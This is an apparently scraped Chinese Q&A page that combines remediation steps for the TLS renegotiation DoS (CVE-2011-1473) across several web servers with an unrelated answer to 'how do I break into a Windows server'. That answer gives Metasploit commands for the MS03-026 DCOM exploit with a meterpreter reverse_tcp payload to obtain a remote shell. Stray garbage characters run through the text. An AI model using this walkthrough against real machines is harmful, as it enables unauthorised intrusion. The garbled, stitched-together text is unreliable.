如何修复windows10上出现的服务器支持 TLS Client-initiated 重协商攻击(CVE-2011-1473)漏洞。
使用SSL开启重协商的服务都会受该漏洞影响
该漏洞存在于SSL renegotiation的过程中。对于使用SSL重协商功能的服务都会受其影响。特别的,renegotiation被用于浏览器到服务器之间的验证。
虽然目前可以在不启用renegotiation进程的情况下使用HTTPS,但很多服务器的默认设置均启用了renegotiation功能。
该漏洞只需要一台普通电脑和DSL连接即可轻易攻破SSL服务器。而对于大型服务器集群来说,则需要20台电脑和120Kbps的网络连接即可实现。
SSL是银行、网上电子邮件服务和其他用于服务器和用户之间保护私人数据并安全通信必不可少的功能。所以本次拒举芹绝服务漏洞影响范围非常广危害非常大。
一、Apache解决办法:
升级到Apache 2.2.15以后版本
二、IIS解决办法:
IIS 5.0启用SSL服务时,也会受影响。可以升级IIS 6.0到更高的版旦衫本。
三、Lighttpd解决办法:
建议升级到lighttpd 1.4.30或者更高,并设置ssl.disable-client-renegotiation = "enable"。
四、Nginx解决办法:
0.7.x升级到nginx 0.7.64
0.8.x升级到 0.8.23 以及更高版本。
五、Tomcat解决办法:
1、使用NIO connector代替BIO connector,因为NIO不支持重协商,参考如下配置:
Connector protocol="org.apache.coyote.http11.Http11NioProtocol"
(可能会影响Tomcat性能);
2、配置Nginx反向代理,在Nginx中修复OpenSSL相关问题。
六、Squid解决办法:
升级到3.5.24以及以后版本
扩展资料:
分布式拒绝服务攻击可以使很多的计模答腔算机在同一时间遭受到攻击,使攻击的目标无法正常使用,分布式拒绝服务攻击已经出现了很多次,导致很多的大型网站都出现了无法进行操作的情况,这样不仅仅会影响用户的正常使用,同时造成的经济损失也是非常巨大的。
分布式拒绝服务攻击方式在进行攻击的时候,可以对源IP地址进行伪造,这样就使得这种攻击在发生的时候隐蔽性是非常好的,同时要对攻击进行检测也是非常困难的,因此这种攻击方式也成为了非常难以防范的攻击。
参考资料来源:百度百科--分布式拒绝服务攻击
您好,我想请教一下如何入侵windows服务器呢???
简单的nmap攻击(默认服务器开启135端口)先用上述nmap扫描目标主机信息,然后进入命令行
msfconsole
search ms03-026-dcom
use exploit/windows/dcerpc/ms03_026_dcom/
set PAYLOAD windows/meterpreter/州销reverse_tcp(选择迹槐工具)
set RHOST 192.168.1.10 //目标主机
set LHOST 192.168.1.11 //操作主机
exploit 执行命令
shell 得到目标姿迹友shell,基本可以为所欲为了
windows服务器远程密码复杂还是被攻击了
您的 Windows 服务器的远程密码可能是被攻击了。建议您采用复杂的密码策略,包括使用长度至少 8 位的密码,使用大写字母消姿、小写字母、数字、符拿镇绝号,以及每隔一旅腊定时间定期更改密码。
0条大神的评论